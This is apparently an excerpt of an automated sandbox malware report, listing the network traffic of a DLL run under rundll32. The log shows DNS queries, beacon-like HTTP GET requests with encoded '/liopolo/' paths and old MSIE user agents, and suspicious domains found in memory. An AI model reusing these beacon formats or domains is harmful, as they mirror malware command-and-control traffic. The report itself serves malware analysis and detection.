                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.151.2 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.151.66 187
                      Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewIP Address: 40.97.161.50 40.97.161.50
                      Source: Joe Sandbox ViewIP Address: 13.82.28.61 13.82.28.61
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/2FUMTLKLdgRo4Z6EcuiEOOc/8fsAz5_2Fq/UDZOXONJb9G0Jl7Sh/YwJHU3HBZfrx/Rr2RrnGmK6E/ePg9xCsP_2FGO_/2FHvWeMzr/F7gd5.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/C3nZ3ojPKuvLDFaD_2FVNtz/i_2BIT_2FM/PkJe7W3e825Ul_2Ff/m4m7583Exh_2/FXgqIY2YIG4/C7y4oW_2FqnMiT/UXE8adViqK_2F0elSuUWK/zwOfFpRmM9Pcjtlo/mhxUAWIol_2Bidj/ZyUBkmkt9UDUf59heB/_2Fa01_2F/fe5khD18VNL3grTs1oBD/Gp7Xm3KoaUrn2NbkVi4/PAUVXoXppe_2FqPWphraUo/OvKmQ_2F/8LQ.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/jpKr3VzL6CFU/K4QwQLlZ56e/n3MZDuNS62Sf0R/mD2lfs_2FQXwlgYrd0DFL/pEDSMAvGReZoZ8Jm/OSgzsTstfQRz_2F/2Bp8zA9yijiTKRH09Q/Mwm_2F7JH/xI5SfnAXURadBpSsyjtC/_2BEE4TT4VBjXUCp_2B/cYd5vNurcHADHrS6HheJd6/UAnImB8Jw2Ynr/9pKHwbRP/FStf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/GOZ7HTzmadDT3EaU6FMaux/8v8OfzSGDIfuI/2JFzbGpa/48oXcRIDJ4CWvryCIOce07l/PRm5ekLf_2/FWrUO776bg5a24LJQ/ndIkg4SZse4c/jL7OG2Z00xG/sTPur68E_2BxS_/2FjGzTP4SxNpm_2FiKI7j/WPoFKl4.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 0c8d249e-2aa6-4c4b-c0dd-a86db3f73cbeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: AM0PR02CU003.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: AM0PR02CA0079.EURPRD02.PROD.OUTLOOK.COMX-CalculatedBETarget: AM0PR10MB2530.EURPRD10.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: niSNDKYqS0zA3ahts/c8vg.1.1X-FEServer: AM0PR02CA0079X-Powered-By: ASP.NETX-FEServer: AM6PR10CA0074Date: Mon, 11 Oct 2021 22:23:43 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 404aa930-782f-c767-6fa8-22dabae1af7bStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAlt-Svc: h3=":443",h3-29=":443"X-CalculatedFETarget: VI1PR04CU006.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: VI1PR04CA0106.EURPRD04.PROD.OUTLOOK.COMX-CalculatedBETarget: VI1P191MB0174.EURP191.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: MKlKQC94Z8dvqCLauuGvew.1.1X-FEServer: VI1PR04CA0106X-Powered-By: ASP.NETX-FEServer: AM6P191CA0036Date: Mon, 11 Oct 2021 22:23:43 GMTConnection: close
                      Source: loaddll32.exe, 00000000.00000003.661990897.0000000000E0F000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.828806436.0000000002C7E000.00000004.00000020.sdmp, WerFault.exe, 00000010.00000003.592082392.00000000052F7000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.603683328.0000000004B23000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: WerFault.exe, 00000010.00000003.590261619.000000000536E000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-op
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752071962.00000000034CB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.578061869.0000000002CDF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752071962.00000000034CB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.578061869.0000000002CDF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                      Source: rundll32.exe, 00000003.00000003.754496414.0000000002CB9000.00000004.00000001.sdmpString found in binary or memory: https://areuranel.website/#
                      Source: rundll32.exe, 00000003.00000003.754370458.0000000002C7E000.00000004.00000001.sdmpString found in binary or memory: https://areuranel.website/liopolo/C_2BfXb0gV5jtbUa/IZmGbVhjqtQp_2F/7qZce0oXF332X4bIP1/uoX46bOOY/izB1
                      Source: loaddll32.exe, 00000000.00000003.575544981.0000000000E52000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756366397.00000000050CC000.00000004.00000040.sdmpString found in binary or memory: https://blogs.msn.com/
                      Source: loaddll32.exe, 00000000.00000003.662022513.0000000000E31000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.826574665.0000000000E31000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.828429749.0000000002C1A000.00000004.00000020.sdmpString found in binary or memory: https://breuranel.website/
                      Source: rundll32.exe, 00000003.00000002.828429749.0000000002C1A000.00000004.00000020.sdmpString found in binary or memory: https://breuranel.website/liopolo/53U65wbAztycwApkbN/Nm6o3zX96/bvCraxUdm00FZ4WM5Wps/p_2FNPk5Ls6JTWqI
                      Source: rundll32.exe, 00000003.00000003.665024714.0000000002C7E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.664845337.0000000002CE0000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/liopolo/wv4vNBBA798s7/I_2FCPxa/4F4kPL6kvjyV14SrT2YW8wi/GOKS69LDnM/P4sY8Z0h
                      Source: rundll32.exe, 00000003.00000003.602334968.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756181648.0000000002CDE000.00000004.00000001.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633990980&rver
                      Source: rundll32.exe, 00000003.00000003.602334968.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633990982&rver
                      Source: loaddll32.exe, 00000000.00000003.752071962.00000000034CB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752019684.0000000000E6A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991064&rver
                      Source: rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756150081.0000000002CF0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756394618.00000000050CB000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991065&rver
                      Source: loaddll32.exe, 00000000.00000003.751977589.0000000000E6C000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752047110.00000000034CC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.756366397.00000000050CC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.756150081.0000000002CF0000.00000004.00000001.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
                      Source: loaddll32.exe, 00000000.00000002.827255923.0000000000E66000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.602499638.0000000002C6E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.828429749.0000000002C1A000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756167295.0000000002CEC000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.602351410.0000000002C7E000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/
                      Source: loaddll32.exe, 00000000.00000003.661990897.0000000000E0F000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/&&
                      Source: rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/G
                      Source: rundll32.exe, 00000003.00000003.799456741.0000000002CE3000.00000004.00000001.sdmpString found in binary or memory: https://msn.com:443/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3
                      Source: loaddll32.exe, 00000000.00000003.662022513.0000000000E31000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com/
                      Source: rundll32.exe, 00000003.00000003.710988432.0000000002C7E000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/
                      Source: rundll32.exe, 00000003.00000003.710988432.0000000002C7E000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/GS
                      Source: rundll32.exe, 00000003.00000003.754595048.0000000002C6E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.710988432.0000000002C7E000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/p
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752071962.00000000034CB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752019684.0000000000E6A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.602334968.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.756150081.0000000002CF0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756394618.00000000050CB000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
                      Source: loaddll32.exe, 00000000.00000003.751977589.0000000000E6C000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.756366397.00000000050CC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: loaddll32.exe, 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.data.msn.com
                      Source: loaddll32.exe, 00000000.00000003.575544981.0000000000E52000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.751977589.0000000000E6C000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756366397.00000000050CC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.577966306.0000000002CD9000.00000004.00000001.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
                      Source: rundll32.exe, 00000003.00000003.602425029.0000000002CB9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/
                      Source: rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fC3nZ3ojPKuvLDFaD_2FVNtz%2fi_2BIT_2FM%2fPkJe7W3e825Ul
                      Source: rundll32.exe, 00000003.00000003.756366397.00000000050CC000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fQXqV1Cwmdgy9RAxuvo%2feyRDOSF4h%2fn5Xdvl6macAzIHUi6g_
                      Source: loaddll32.exe, 00000000.00000003.751977589.0000000000E6C000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fjpKr3VzL6CFU%2fK4QwQLlZ56e%2fn3MZDuNS62Sf0R%2fmD2lfs
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fr_2FdFpkR4VdtsN08a%2f_2BmiRrdo%2fiRPVi0tWAScg5sVGfo6
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752071962.00000000034CB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752019684.0000000000E6A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.602334968.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.756150081.0000000002CF0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756394618.00000000050CB000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"
                      Source: rundll32.exe, 00000003.00000003.602425029.0000000002CB9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.602351410.0000000002C7E000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/C3nZ3ojPKuvLDFaD_2FVNtz/i_2BIT_2FM/PkJe7W3e825Ul_2Ff/m4m7583Exh_2/F
                      Source: rundll32.exe, 00000003.00000003.799456741.0000000002CE3000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799523846.0000000002C7E000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3
                      Source: loaddll32.exe, 00000000.00000003.575544981.0000000000E52000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.662022513.0000000000E31000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5v
                      Source: rundll32.exe, 00000003.00000003.710948632.0000000002CDD000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com
                      Source: loaddll32.exe, 00000000.00000003.664473384.0000000000E64000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9
                      Source: rundll32.exe, 00000003.00000003.710948632.0000000002CDD000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.754370458.0000000002C7E000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84
                      Source: unknownDNS traffic detected: queries for: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/2FUMTLKLdgRo4Z6EcuiEOOc/8fsAz5_2Fq/UDZOXONJb9G0Jl7Sh/YwJHU3HBZfrx/Rr2RrnGmK6E/ePg9xCsP_2FGO_/2FHvWeMzr/F7gd5.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/C3nZ3ojPKuvLDFaD_2FVNtz/i_2BIT_2FM/PkJe7W3e825Ul_2Ff/m4m7583Exh_2/FXgqIY2YIG4/C7y4oW_2FqnMiT/UXE8adViqK_2F0elSuUWK/zwOfFpRmM9Pcjtlo/mhxUAWIol_2Bidj/ZyUBkmkt9UDUf59heB/_2Fa01_2F/fe5khD18VNL3grTs1oBD/Gp7Xm3KoaUrn2NbkVi4/PAUVXoXppe_2FqPWphraUo/OvKmQ_2F/8LQ.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/jpKr3VzL6CFU/K4QwQLlZ56e/n3MZDuNS62Sf0R/mD2lfs_2FQXwlgYrd0DFL/pEDSMAvGReZoZ8Jm/OSgzsTstfQRz_2F/2Bp8zA9yijiTKRH09Q/Mwm_2F7JH/xI5SfnAXURadBpSsyjtC/_2BEE4TT4VBjXUCp_2B/cYd5vNurcHADHrS6HheJd6/UAnImB8Jw2Ynr/9pKHwbRP/FStf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
